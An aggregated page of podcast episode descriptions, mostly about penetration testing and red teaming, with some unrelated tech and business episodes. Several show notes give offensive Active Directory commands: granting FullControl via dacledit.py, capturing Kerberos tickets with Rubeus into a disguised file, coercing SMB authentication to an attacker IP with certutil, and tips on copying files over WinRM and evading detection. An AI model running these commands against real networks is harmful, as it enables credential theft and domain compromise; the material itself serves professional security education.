Method of evaluating computer and network security by simulating a cyber attack
What, we've never talked about blue team? Well, now it's done: enjoy the masterclass and become the master of false positives! The shows are recorded live on Twitch and rebroadcast on YouTube before becoming podcasts. Come and attend the live recording! Hosted by Ausha. Visit ausha.co/politique-de-confidentialite for more information.
Today's a fun tale of pentest pwnage where we leveraged a WinRM service ticket in combination with the shadow credentials attack, then connected to an important system using evil-winrm and made our getaway with some privileged Kerberos TGTs! I also share an (intentionally) vague story about a personal struggle I could use your thoughts/prayers/vibes with.
Joas Santos is a Red Team specialist and brings a practical view of how to think about security offensively. We talk about social engineering, penetration testing, threat intelligence, mentoring, and the challenges of building defenses that really work. A direct conversation with someone on the front line of cybersecurity in Brazil.
Hola friends! Today's tale of pentest pwnage talks about abusing Exchange and the Azure ADSync account! Links to the discussed things:
- adconnectdump – for all your ADSync account dumping needs!
- Adam Chester's PowerShell script to dump the MSOL service account
- dacledit.py (part of Impacket) to give myself full write privileges on the MSOL sync account: `dacledit.py -action 'write' -rights 'FullControl' -principal lowpriv -target MSOL-SYNC-ACCOUNT -dc-ip 1.2.3.4 domain.com/EXCHANGEBOX$ -k -no-pass`
- Looking to tighten up your Exchange permissions? Check out this crazy detailed post
In this episode of the Human Firewall Podcast, Gordon Shepherd, Team Leader Infrastructure & Operations at the Scheuch Group, reports on a spectacular pentest: hackers broke into the company and even made off with two company cars. With Dr. Christian Reinhardt he discusses why such incidents must be handled openly and transparently, and how (and when) best to do so. How do you create real awareness without wagging a finger? Gordon shares his experiences, from (overly) convincing phishing simulations to current AI trends. Want to know which trends Gordon sees for the coming years and which priorities he sets? Then listen to the latest episode of the Human Firewall Podcast now!
We pick up the pace for this second episode... on to phishing and the red team!
Today we have a smattering of miscellaneous pentest tips to help you pwn all the stuff!
- Selective Snaffling with Snaffler
- The importance of having plenty of dropbox disk space – for redundant remote connectivity and PXE abuse!
- TGTs can be fun for SMB riffling, targeted Snaffling, netexec-ing and Evil-WinRMing!
A domain that is everywhere yet often ignored by beginners: this time we explore the basics of pentesting in cloud environments. Part one, covering the methodology basics of a classic pentest.
HACK THE PLANET! Part two, discovering the contents of the bag of tricks and seeing something other than the Flipper Zero!
HACK THE PLANET! Part one, discovering the contents of the bag of tricks and seeing something other than the Flipper Zero!
News includes Erlang/OTP achieving OpenChain ISO certification for open source license compliance, the release of the new "Elixir Patterns" book by Hugo Barauna and Alex Koutmos, a security audit of Oban Web and Pro by Paraxial.io showing excellent results, the upcoming Alchemy Conf in Portugal, a major rewrite of the asdf version manager in Go, and more!

Show Notes online: http://podcast.thinkingelixir.com/240

Elixir Community News
- https://bsky.app/profile/theerlef.bsky.social/post/3lhc5552djc24 – Erlang/OTP team announces compliance with the OpenChain ISO/IEC 5230 standard for open source license compliance.
- https://openchainproject.org/featured/2025/02/01/erlang-otp-iso5230 – Details about OpenChain certification and its importance for Erlang/OTP's 2025 goals for enhancing community infrastructure.
- https://podcast.thinkingelixir.com/220 – Reference to the Allistair Woodman episode providing additional context about Erlang/OTP.
- https://www.elixirpatterns.dev/#pricing – New book "Elixir Patterns" by Hugo Barauna and Alex Koutmos has been released.
- https://bsky.app/profile/hugobarauna.com/post/3lgv5yfw5o22q – Author's announcement about the Elixir Patterns book release.
- https://www.elixirpatterns.dev/#free-chapters – Free sample chapters of the Elixir Patterns book available with accompanying Livebooks.
- https://www.youtube.com/watch?v=AZZvljvgKy8 – Launch livestream recording for the Elixir Patterns book.
- https://paraxial.io/blog/oban-pentest – Security audit results for Oban Web and Oban Pro by Paraxial.io, showing no critical vulnerabilities.
- https://alchemyconf.com/ – Announcement for Alchemy Conf happening April 2-3 in Braga, Portugal.
- https://x.com/hugobarauna/status/1886766098411909420 – Hugo Barauna announces he'll be speaking about Livebook and Livebook Teams internals at Alchemy Conf.
- https://stratus3d.com/blog/2025/02/03/asdf-has-been-rewritten-in-go/ – Announcement about the asdf v0.16 major update and rewrite in Go.
- https://asdf-vm.com/guide/upgrading-to-v0-16.html#installation – Installation guide for the new asdf v0.16 with breaking changes.

Do you have some Elixir news to share? Tell us at @ThinkingElixir (https://twitter.com/ThinkingElixir) or email show@thinkingelixir.com.

Find us online:
- Message the show on Bluesky: https://bsky.app/profile/thinkingelixir.com
- Message the show on X: https://x.com/ThinkingElixir
- Message the show on Fediverse: @ThinkingElixir@genserver.social (https://genserver.social/ThinkingElixir)
- Email the show: show@thinkingelixir.com
- Mark Ericksen on X: @brainlid (https://x.com/brainlid)
- Mark Ericksen on Bluesky: @brainlid.bsky.social (https://bsky.app/profile/brainlid.bsky.social)
- Mark Ericksen on Fediverse: @brainlid@genserver.social (https://genserver.social/brainlid)
- David Bernheisel on Bluesky: @david.bernheisel.com (https://bsky.app/profile/david.bernheisel.com)
- David Bernheisel on Fediverse: @dbern@genserver.social (https://genserver.social/dbern)
Today we've got some super cool stuff to cover! First up, BPATTY v1.4 is out and has a slew of cool things:
- A whole new section on old-school wifi tools like airmon-ng, aireplay-ng and airodump-ng
- Syntax on using two different tools to parse creds from Dehashed
- An updated tutorial on using Gophish for phishing campaigns
The cocoa-flavored cherry on top is a tale of pentest pwnage that includes:
- Abusing SCCM
- Finding gold in SQL configuration/security audits
Get your FREE 2024 Cybersecurity Salary Guide: https://www.infosecinstitute.com/form/cybersecurity-salary-guide-podcast/?utm_source=audio&utm_medium=podcast&utm_campaign=podcast

In this episode of Cyber Work Hacks, guest James Stanger from CompTIA dives into the PenTest+ certification. He explains the critical distinctions between pentesting and hacking and outlines the essential career skills involved in pentesting, such as network discovery, social engineering and vulnerability analytics. Viewers will also learn about hands-on activities to enhance their resumes and hear valuable advice for entering cybersecurity roles. The episode touches on adjacent career paths like GRC, threat hunting and vulnerability management while providing practical tips for preparing for the PenTest+ exam.

00:00 - Introduction to PenTest+ certification
01:02 - Overview of cybersecurity job market
01:56 - Guest introduction: James Stanger from CompTIA
02:33 - Deep dive into PenTest+ certification
04:42 - Career paths with PenTest+ certification
07:27 - Getting started in pentesting
09:12 - Hands-on experience and practical tips
10:58 - Study tips for PenTest+ exam
11:34 - Conclusion and final thoughts

View Cyber Work Podcast transcripts and additional episodes: https://www.infosecinstitute.com/podcast/?utm_source=audio&utm_medium=podcast&utm_campaign=podcast

About Infosec
Infosec's mission is to put people at the center of cybersecurity. We help IT and security professionals advance their careers with skills development and certifications while empowering all employees with security awareness and phishing training to stay cyber-safe at work and home. More than 70% of the Fortune 500 have relied on Infosec Skills to develop their security talent, and more than 5 million learners worldwide are more cyber-resilient from Infosec IQ's security awareness training. Learn more at infosecinstitute.com.
Expand your knowledge of the future of pentesting with the latest episode of Cybersecurity ist Chefsache! This time Nico Werner talks with Martin Haunschmid, Managing Director of Adversary GmbH, about the exciting opportunities and challenges of AI in pentesting.

Episode contents:
- Automation vs. humanity: where AI makes processes easier, and where it fails.
- The role of intuition: why pentesters remain indispensable.
- Dangers of misjudgement: what happens when AI oversteps its limits.
- Efficiency gains through AI: how reporting and checklists become smarter.

Martin Haunschmid shares his hands-on experience and explains why companies should see AI as support, not as a replacement. Especially important: the right balance between technology, experience and ethical responsibility.
Hey friends, we've got a short but sweet tale of pentest pwnage for you today. Key lessons learned:
- Definitely consider BallisKit for your EDR-evasion needs
- If you get local admin to a box, enumerate, enumerate, enumerate! There might be a delicious task or service set to run as a domain admin that can quickly escalate your privileges!
Oooooo, giggidy! Today is (once again) my favorite tale of pentest pwnage. I learned about a feature of PowerUpSQL that helped me find a "hidden" SQL account, and that account ended up being the key to the entire pentest! I wonder how many hidden SQL accounts I've missed on past pentests... SIGH! Check out the awesome BloodHound gang thread about this here. Also, can't get Rubeus monitor mode to capture TGTs to the registry? Try output to file instead: `rubeus monitor /interval:5 /nowrap /runfor:60 /consoleoutfile:c:\users\public\some-innocent-looking-file.log` In the tangent department, I talk about a personal music project I'm resurrecting to help my community.
Why is the work of hackers important? We chat with Antonio Fernandes, cybersecurity expert and one of the best-known bug hunters in Spain, with public recognition from Google, Facebook, the US Department of Defense and the European Union. We also find out whether it is possible to hack a country's railway network with hardware hacking specialist Gabriela García, known for presenting her research at leading cybersecurity conferences such as RootedCON, Black Hat and DEFCON in Las Vegas. In this episode we discover what penetration tests, or pentests, are and how ethical hackers work to identify vulnerabilities before cybercriminals do. Subscribe to our newsletter to hear new episodes first and learn about extra related content.
Hey! I'm speaking in Wenatchee, Washington next week at the NCESD conference about 7 ways to panic a pentester! Today's tale of pentest pwnage is a great reminder to enumerate, enumerate, enumerate! It also emphasizes that cracking NETLM/NETNTLMv1 isn't super easy to remember the steps for (at least for me), but this crack.sh article makes it a bit easier!
Le Café de l'e-commerce is the podcast that lets you keep up with e-commerce news, differently, in your ears, even when the public debt makes your head spin. In this episode we talk about TEMU, the second most visited e-commerce site in the world. About SHEIN, whose stock market listing is taking shape. About the Digital Services Act, which is calling certain platforms to order for possible non-compliance with European legislation. But also:
Today we continue where we left off in episode 641, but this time talking about how to automatically deploy and install an Ubuntu-based dropbox! I also share some love for exegol as an all-in-one Active Directory pentesting platform.
In today's episode, we'll hear from Craig Jeffery on pentests. What are they, who performs them, and why are they vital for cyber security? Listen in to learn more.
Today we're revisiting the fun world of automating pentest dropboxes using Proxmox, Ansible, Cursor and Level. Plus, a tease about how all this talk about automation is getting us excited for a long-term project: creating a free/community edition of Light Pentest LITE training!
This was my favorite pentest tale of pwnage to date! There's a lot to cover in this episode so I'm going to try and bullet out the TLDR version here:
- Sprinkled farmer files around the environment
- Found high-priv boxes with WebClient enabled
- Added a "ghost" machine to the Active Directory (we'll call it GHOSTY)
- RBCD attack to be able to impersonate a domain admin using the CIFS/SMB service against the victim system where some higher-priv users were sitting
- Use net.py to add myself to local admin on the victim host
- Find a vulnerable service to hijack and have it run an evil, TGT-gathering Rubeus.exe – found that Credential Guard was cramping my style!
- Pulled the TGT from a host not protected with Credential Guard
- Figured out the stolen user's account has some "write" privileges to a domain controller
- Use rbcd.py to delegate from GHOSTY to the domain controller
- Request a TGT for GHOSTY
- Use getST.py to impersonate CIFS using a domain admin account on the domain controller (important thing here was to specify the DC by its FQDN, not just hostname)
- Final move: use the domain admin ccache file to leverage net.py and add myself to the Active Directory Administrators group
Today's tale of pentest pwnage talks about the dark powers of the net.py script from impacket.
Today we're talking pentesting – specifically some mini gems that can help you escalate local/domain/SQL privileges:
- Check the C: drive! If you get local admin and the system itself looks boring, check the root of C: – it might have some interesting scripts or folders with tools that have creds in them. Also look at Get-ScheduledTasks.
- Find IDs and passwords easily in Snaffler output with this Snaffler cleaner script
- There's a ton of gold to (potentially) be found in SQL servers – check out my notes on using PowerUpSQL to find misconfigs and agent jobs you might be able to abuse!
Esben Friis-Jensen is the Co-Founder and Chief Growth Officer at Userflow, the fastest way for user onboarding for modern SaaS businesses. He is also the Co-Founder and Adviser at Cobalt, a modern application security platform enabling businesses to run on-demand Penetration Testing and vulnerability assessments - Pentest as a Service. The goal of this episode is to accelerate learning while transitioning from sales-led to product-led. Esben will talk about the whole transition: what other leaders are doing in this transition and what mistakes they make, to avoid making them again.

Show Notes
[01:09] A brief background about Esben
[03:38] His thoughts when they started the product-led movement
[07:11] Reasons why they started out as more sales-led
[11:15] The challenges they experienced along the way
[15:40] How they fostered organizational change
[18:55] The process they went through to get the rest of the team onboard
[23:32] How they got buy-in from the teams in the process of transitioning
[28:49] First quick wins they had in testing the unknowns
[34:50] More advice on iteration from Esben
[37:42] The next thing for him at Userflow
[39:47] Where to find Esben

About Esben Friis-Jensen
Esben Friis-Jensen is originally from Denmark but has lived in the United States for the last eight years. Aside from Userflow and Cobalt, he has also worked as a consultant in the SAP division of Accenture, responsible for managing the test and deployment of global large-scale SAP implementations.

Links: Product-Led Slack, Profiles, Userflow, Cobalt, LinkedIn
In 7 Minutes on ITSPmagazine Short Brand Story recorded on location during Black Hat USA 2024, Sean Martin had a fascinating conversation with Snehal Antani, CEO and Co-Founder of Horizon3.ai. The discussion revolved around the innovative strides Horizon3.ai is making in autonomous penetration testing and continuous security posture management.

Snehal Antani shared his journey from being a CIO to founding Horizon3.ai, highlighting the critical gaps in traditional security measures that led to the inception of the company. The main focus at Horizon3.ai is to continuously verify security postures through autonomous penetration testing, essentially enabling organizations to "hack themselves" regularly to stay ahead of potential threats. Antani explained the firm's concept of "go hack yourself," which emphasizes continuous penetration testing. This approach ensures that security vulnerabilities are identified and addressed proactively rather than reacting after an incident occurs.

A significant portion of the discussion centered around the differentiation between application and infrastructure penetration testing. While application pen testing remains a uniquely human task due to the need for identifying logic flaws in custom code, infrastructure pen testing can be effectively managed by algorithms at scale. This division allows Horizon3.ai to implement a human-machine teaming workflow, optimizing the strengths of both.

Antani likened its functionality to installing ring cameras while conducting a pen test, creating an early warning network through the deployment of honey tokens. These tokens are fake credentials and sensitive command tokens designed to attract attackers, triggering alerts when accessed. This early warning system helps organizations build a high signal, low noise alert mechanism, enhancing their ability to detect and respond to threats swiftly.

Antani emphasized that Horizon3.ai is not just a pen testing company but a data company. The data collected from each penetration test provides valuable telemetry that improves algorithm accuracy and offers insights into an organization's security posture over time. This data-centric approach allows Horizon3.ai to help clients understand and articulate their security posture's evolution.

A compelling example highlighted in the episode involved a CISO from a large chip manufacturing company who utilized Horizon3.ai's rapid response capabilities to address a potential vulnerability swiftly. The CISO was able to identify, test, fix, and verify the resolution of a critical exploit within two hours, showcasing the platform's efficiency and effectiveness.

The conversation concluded with a nod to the practical benefits such innovations bring, encapsulating the idea that effective use of Horizon3.ai's tools not only promotes better security outcomes but also enables security teams to perform their roles more efficiently, potentially even getting them home earlier.

Learn more about Horizon3.ai: https://itspm.ag/horizon3ai-bh23

Note: This story contains promotional content. Learn more.

Guest: Snehal Antani, Co-Founder & CEO at Horizon3.ai [@Horizon3ai]
On LinkedIn | https://www.linkedin.com/in/snehalantani/
On Twitter | https://twitter.com/snehalantani

Resources
Learn more and catch more stories from Horizon3.ai: https://www.itspmagazine.com/directory/horizon3ai
View all of our OWASP AppSec Global Lisbon 2024 coverage: https://www.itspmagazine.com/owasp-global-2024-lisbon-application-security-event-coverage-in-portugal
Learn more about 7 Minutes on ITSPmagazine Short Brand Story Podcasts: https://www.itspmagazine.com/purchase-programs
Newsletter Archive: https://www.linkedin.com/newsletters/tune-into-the-latest-podcasts-7109347022809309184/
Business Newsletter Signup: https://www.itspmagazine.com/itspmagazine-business-updates-sign-up
Are you interested in telling your story? https://www.itspmagazine.com/telling-your-story
Hi, today's tale of pentest pwnage covers a few wins and one loss:
- A cool opportunity to drop Farmer "crops" to a domain admin's desktop folder via a PowerShell remote session
- Finding super sensitive data by dumpster-diving into a stale C:\Users\Domain-Admin profile
- Finding a vCenter database backup and being unable to pwn it using vcenter_saml_login
Today's tale of pentest pwnage includes some fun stuff, including:
- SharpGPOAbuse helps abuse vulnerable GPOs! Try submitting a harmless POC first via a scheduled task – like `ping -n 1 your.kali.ip.address`. When you're ready to fire off a task that coerces SMB auth, try `certutil -syncwithWU \\your.kali.ip.address\arbitrary-folder`.
- I'm not 100% sure on this, but I think scheduled tasks capture Kerberos tickets temporarily to workstation(s). If you're on a compromised machine, try `Get-ScheduledTask -taskname "name" | select *` to get information about what context the attack is running under.
- DonPAPI got an upgrade recently with a focus on evasion!
- When attacking vCenter (see our past YouTube stream for a walkthrough), make sure you've got the vmss2core utility, which I couldn't find anywhere except the Internet Archive. Then I really like to follow this article to pull passwords from VM memory dumps.
- Can't RDP into a victim system that you're PSRemote'd into? Maybe RDP is listening on an alternate port! Try `Get-ItemProperty -path "HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" | select-object portnumber`
- And if you want to hang around until the very end, you can hear me brag about my oldest son who just became an EMT!
Hi friends, today's a tale full of test tips and tools to help you in your adventures in pentesting!
- SCCM Exploitation: The First Cred Is the Deepest II w/ Gabriel Prud'homme – fantastic resource for learning all about attacking SCCM, starting from a perspective of zero creds
- CMLoot – find interesting files stored on (System Center) Configuration Manager (SCCM/CM) SMB shares
- Snaffler – finds all the interesting SMB shares and juicy file contents
- Efflanrs – takes the raw Snaffler log and turns it into an interactive Web app!
- RubeusToCcache – a small tool to convert Base64-encoded .kirbi tickets from Rubeus into .ccache files for Impacket
Guest: Abraham Aranguren, Managing Director at 7ASecurity [@7aSecurity]
On LinkedIn | https://www.linkedin.com/in/abrahamaranguren/

Hosts: Sean Martin, Co-Founder at ITSPmagazine [@ITSPmagazine] and Host of Redefining CyberSecurity Podcast [@RedefiningCyber]
On ITSPmagazine | https://www.itspmagazine.com/sean-martin
Marco Ciappelli, Co-Founder at ITSPmagazine [@ITSPmagazine] and Host of Redefining Society Podcast
On ITSPmagazine | https://www.itspmagazine.com/itspmagazine-podcast-radio-hosts/marco-ciappelli

Episode Notes
In this On Location episode recorded in Lisbon at the OWASP AppSec Global event, Sean Martin engages in a comprehensive discussion with Abraham Aranguren, a cybersecurity trainer skilled at hacking IoT, iOS, and Android devices. The conversation delves into the intricacies of mobile application security, touching on both the technical and procedural aspects that organizations must consider to build and maintain secure apps.

Abraham Aranguren, known for his expertise in cybersecurity training, shares compelling insights into identifying IoT vulnerabilities without physically having the device. By reverse engineering applications, one can uncover potential security flaws and understand how apps communicate with their IoT counterparts. For instance, Aranguren describes exercises where students analyze mobile apps to reveal hardcoded passwords and unsecured Wi-Fi connections used to manage devices like drones.

A significant portion of the discussion revolves around real-world examples of security lapses in mobile applications. Aranguren details an incident involving a Chinese government app that harvests personal data from users' phones, highlighting the serious privacy implications of such vulnerabilities. Another poignant example is Hong Kong's COVID-19 contact-tracing app, which stored sensitive user information insecurely, revealing how even high-budget applications can suffer from critical security flaws if not properly tested.

Sean Martin, drawing from his background in software quality assurance, emphasizes the importance of establishing clear, repeatable processes and workflows to ensure security measures are consistently applied throughout the development and deployment phases. He and Aranguren agree that while developers need to be educated in secure coding practices, organizations must also implement robust processes, including code reviews, automated tools for static analysis, and third-party audits to identify and rectify potential vulnerabilities.

Aranguren stresses the value of pentests, noting that organizations often show significant improvement over multiple tests. He shares experiences of clients who, after several engagements, greatly reduced the number of exploitable vulnerabilities. Regular, comprehensive testing, combined with a proactive approach to fixing identified issues, helps create a robust security posture, ultimately making applications harder to exploit and dissuading potential attackers.

For businesses developing apps, this episode underscores the necessity of integrating security from the ground up, continuously educating developers, enforcing centralized security controls, and utilizing pentests as a tool for both validation and education. The ultimate goal is to make applications resilient enough to deter attackers, ensuring both the business and its users are protected.

Be sure to follow our Coverage Journey and subscribe to our podcasts!

Follow our OWASP AppSec Global Lisbon 2024 coverage: https://www.itspmagazine.com/owasp-global-2024-lisbon-application-security-event-coverage-in-portugal
On YouTube:
Today's tale of pentest pwnage is all about my new favorite attack called SPN-less RBCD. We did a teaser episode last week that actually ended up being a full episode all about the attack, and even step by step commands to pull it off. But I didn't want today's episode to just be "Hey friends, check out the YouTube version of this attack!" so I also cover:
Our first impressions of Burp Enterprise
Why I have a real hard time believing you have to follow all these steps to install Kali on Proxmox
Today's prelude to a tale of pentest pwnage talks about something called “spnless RBCD” (resource-based constrained delegation). The show notes don't format well here in the podcast notes, so head to 7minsec.com to see the notes in all their glory.
#032 - In this next episode, I was joined by Shawn Abelson, physical red teamer, business owner, and graduate faculty member with the University of Minnesota's Security Technology Program. Shawn's led and developed Red Team programs and he has a ton of great insights for those interested in the red team philosophy and how to develop red teaming skills. His experience spans diverse roles in the public and private sectors. Shawn has earned his Master of Science in Security Technologies from the University of Minnesota and now instructs in that same program.
Today's conversation focused on what red teaming is, what a typical client engagement looks like, how an aspiring professional could get into physical red teaming, and much more.
-- Get the resources and show notes mentioned in this episode --
https://thesecuritystudent.com/shownotes
We did something crazy today and recorded an episode that was 7 minutes long! Today we talk about some things that have helped us out in recent pentests:
When using Farmer to create "trap" files that coerce authentication, I've found way better results using Windows Search Connector (.searchConnector-ms) files.
This matrix of "can I relay this to that" has been super helpful, especially early in engagements.
Today's episode is all about writing reports in Sysreptor. It's awesome! Main takeaways:
The price is free (they have a paid version as well)!
You can send findings and artifacts directly to the report server using the reptor Python module.
Warning: Sysreptor only exports to PDF (no Word version option!)
Sysreptor has helped us write reports faster without sacrificing quality.
Guests: Henry Danielson, Volunteer at AeroSpace Village [@SecureAerospace]
On LinkedIn | https://www.linkedin.com/in/henry-danielson-43a61213/
On Twitter | https://twitter.com/hdanielson
Liz Wharton, Founder, Silver Key Strategies [@silverkeystrat]
On LinkedIn | https://www.linkedin.com/in/elizabeth-wharton/
On Mastodon | https://infosec.exchange/@LawyerLiz
On Twitter | https://twitter.com/LawyerLiz
____________________________
Hosts: Sean Martin, Co-Founder at ITSPmagazine [@ITSPmagazine] and Host of Redefining CyberSecurity Podcast [@RedefiningCyber]
On ITSPmagazine | https://www.itspmagazine.com/sean-martin
Marco Ciappelli, Co-Founder at ITSPmagazine [@ITSPmagazine] and Host of Redefining Society Podcast
On ITSPmagazine | https://www.itspmagazine.com/itspmagazine-podcast-radio-hosts/marco-ciappelli
____________________________
Episode Notes
The Aerospace Village at the RSA Conference 2024 is gearing up to be an event filled with innovation, collaboration, and excitement. In a recent episode of "Chats on the Road to RSA Conference 2024" with Sean Martin and Marco Ciappelli, the hosts dig into the details of what attendees can expect at the Aerospace Village. Let's take a closer look at the insights shared during this engaging discussion.
Unveiling the Aerospace Village Experience:
The podcast episode kicks off with Marco Ciappelli welcoming listeners to the conversation alongside guests Henry Danielson and Liz Wharton. The trio's palpable enthusiasm sets the stage for a deep dive into the diverse offerings of the Aerospace Village at RSA Conference 2024.
Innovative Initiatives and Collaborations:
Henry Danielson shares exclusive details about the Aerospace Village's collaboration with BuddhaBot to introduce a unique badge experience focused on constellations. The hands-on challenges and engaging activities promise an immersive experience for attendees, emphasizing learning through interactive participation.
Exciting Activities and Exhibits:
The conversation unfolds with discussions on Pen Test Partners' flight simulator and the AMSAT project, showcasing opportunities for visitors to explore CubeSat technology and ground control stations. The Space Grand Challenge, aimed at educating young minds in the cybersecurity realm, further highlights the village's commitment to fostering innovation and knowledge sharing.
Insightful Industry Conversations:
Liz Wharton sheds light on the importance of vulnerability disclosures in the aerospace industry and emphasizes the significance of building robust security practices collaboratively. The dialogue underscores the village's role in fostering critical conversations around cybersecurity, aviation, and space exploration.
Community Engagement and Visionary Leadership:
Hosts and guests express their excitement for the upcoming RSA Conference and encourage attendees to join the vibrant community at the Aerospace Village. From showcasing cutting-edge technologies to facilitating thought-provoking discussions, the village promises to be a hub of inspiration and knowledge exchange.
As the episode concludes, the hosts extend a warm invitation to all enthusiasts, innovators, and industry professionals to participate in the vibrant experience awaiting them at the Aerospace Village during RSA Conference 2024. The blend of education, engagement, and collaboration sets the stage for an unforgettable event that promises to shape the future of the aerospace and cybersecurity industries.
Stay tuned for more updates and insights as we venture into the dynamic world of Aerospace Village at RSA Conference 2024!
Be sure to follow our Coverage Journey and subscribe to our podcasts!
____________________________
Follow our RSA Conference USA 2024 coverage: https://www.itspmagazine.com/rsa-conference-usa-2024-rsac-san-francisco-usa-cybersecurity-event-infosec-conference-coverage
On YouTube:
Hey friends, today we've got a tale of pentest pwnage that covers:
Passwords – make sure to look for patterns such as keyboard walks, as well as people who are picking passwords where the month the password changed is part of the password (say that five times fast)!
Making sure you go after cached credentials
Attacking SCCM – Misconfiguration Manager is an absolute gem to read, and The First Cred is the Deepest – Part 2 with Gabriel Prud'homme is an absolute gem to see. Also, check out sccmhunter for all your SCCM pwnage needs.
Hey friends, sorry I'm so late with this (er, last) week's episode but I'm back! Today is more of a prep for tales of pentest pwnage, but topics covered include:
Make sure when you're snafflin' that you check for encrypted/obfuscated logins and login strings – it might not be too tough to decrypt them!
On the defensive side, I've found myself getting *blocked* doing things like SharpHound runs, Snaffler, PowerHuntShares, etc. Look through the readme files for these tools and try cranking down the intensity/threads of these tools and you might fly under the radar.
Today's tale of pentest pwnage covers:
Farming for credentials (don't forget to understand trusted zones to make this happen properly!)
Snaffling for juicy file shares
Stealing Kerberos tickets with Rubeus
Hey friends, today we cover a funstrating (that's fun + frustrating) issue we had with our DIY pentest dropboxes. TLDL: The preseed file got jacked because I had a bad Kali metapackage in it. While I was tinkering around with preseed files, I decided it would be more efficient to have the Kali ISO call that preseed file directly over HTTP (rather than make a new ISO every time I made a preseed change). To accomplish that:
Mount the Kali ISO
Explore to isolinux > txt.cfg
Modify the txt.cfg to include a custom boot option that calls your preseed over HTTP. For example:
label install
  menu label ^Install Yermaum
  kernel /install.amd/vmlinuz
  append net.ifnames=0 preseed/url=https://somewebsite/kali.preseed locale=en_US keymap=us hostname=kali777 domain=7min.sec simple-cdd/profiles=kali desktop=xfce vga=788 initrd=/install.amd/initrd.gz --- quiet
Let's hack cybersecurity in 2024 with Melanie Rieback, Co-founder & CEO of Radically Open Security, the world's first not-for-profit cybersecurity consultancy with a focus on PenTesting
Today we're talking about how you can use PatchMyPc to keep your home PC and/or pentest dropbox automatically updated with the latest/greatest patches!
Today we talk about an awesome path to internal network pentest pwnage using downgraded authentication from a domain controller, a tool called ntlmv1-multi, and a boatload of cloud-cracking power on the cheap from vast.ai. Here are my chicken scratch notes for how to take the downgraded authentication hash capture (using Responder.py -I eth0 --lm) and eventually tweeze out the NTLM hash of the domain controller (see https://7ms.us for full show notes).
In today's tale of pentest pwnage we talk about:
The importance of local admin and how access to even one server might mean instant, full control over their backup or virtualization infrastructure.
Copying files via WinRM when copying over SMB is blocked:
$sess = New-PSSession -ComputerName SERVER-I-HAVE-LOCAL-ADMIN-ACCESS-ON -Credential *
...then provide your creds...and then:
Copy-Item c:\superimportantfile.doc -Destination c:\my-local-hard-drive\superimportantfile.doc -FromSession $sess
If you come across PowerShell code that crafts a secure string credential, you may be able to decrypt the password variable with:
[System.Runtime.InteropServices.Marshal]::PtrToStringAuto([System.Runtime.InteropServices.Marshal]::SecureStringToBSTR($MyVarIWantToDecryptGoesHere))
Cloud Security Pentest is not just a Cloud configuration review! Blackhat 2023 & Defcon 31 conversations included Cloud Security Podcast asking traditional and experienced pentesters about their opinion on cloud security pentesting, and the divide was between it being a config review or a product pentest. For this episode we have Seth Art from Bishop Fox to clarify the myth.
Episode YouTube: Video Link
Host Twitter: Ashish Rajan (@hashishrajan)
Guest Socials: Seth Art's Linkedin (Seth Art Linkedin)
Podcast Twitter - @CloudSecPod
If you want to watch videos of this LIVE STREAMED episode and past episodes - Check out our other Cloud Security Social Channels:
- Cloud Security Newsletter
- Cloud Security BootCamp
Spotify timestamps for interview questions:
(00:00) Introduction
(05:17) A bit about Seth Art
(06:44) Network vs Infrastructure Security Pentest
(08:00) Internal vs External Network Security Pentest
(10:26) Assumed vs Objective Based Pentest
(12:51) Is network pentest dead?
(14:04) How to approach network and cloud pentests?
(20:12) Cloud pentest is more than config review
(24:04) Examples of cloud pentest findings
(30:07) Scaling pentests in cloud
(32:25) Traditional skillsets to cloud pentest
(36:58) A bit about cloudfoxable
(39:31) Cloud pentest and Zero Trust
(40:54) Staying ahead of CSP releases
(44:31) Third party shared responsibility
(47:35) 1 fun question
(48:36) Boundary for cloud pentest
(52:21) Last 2 fun questions
These are some of the resources that Seth shared during the episode along with the tools he has created:
CloudFox
CloudFoxable
flAWS
flAWS 2
iamvulnerable
Cloud Goat
See you at the next episode!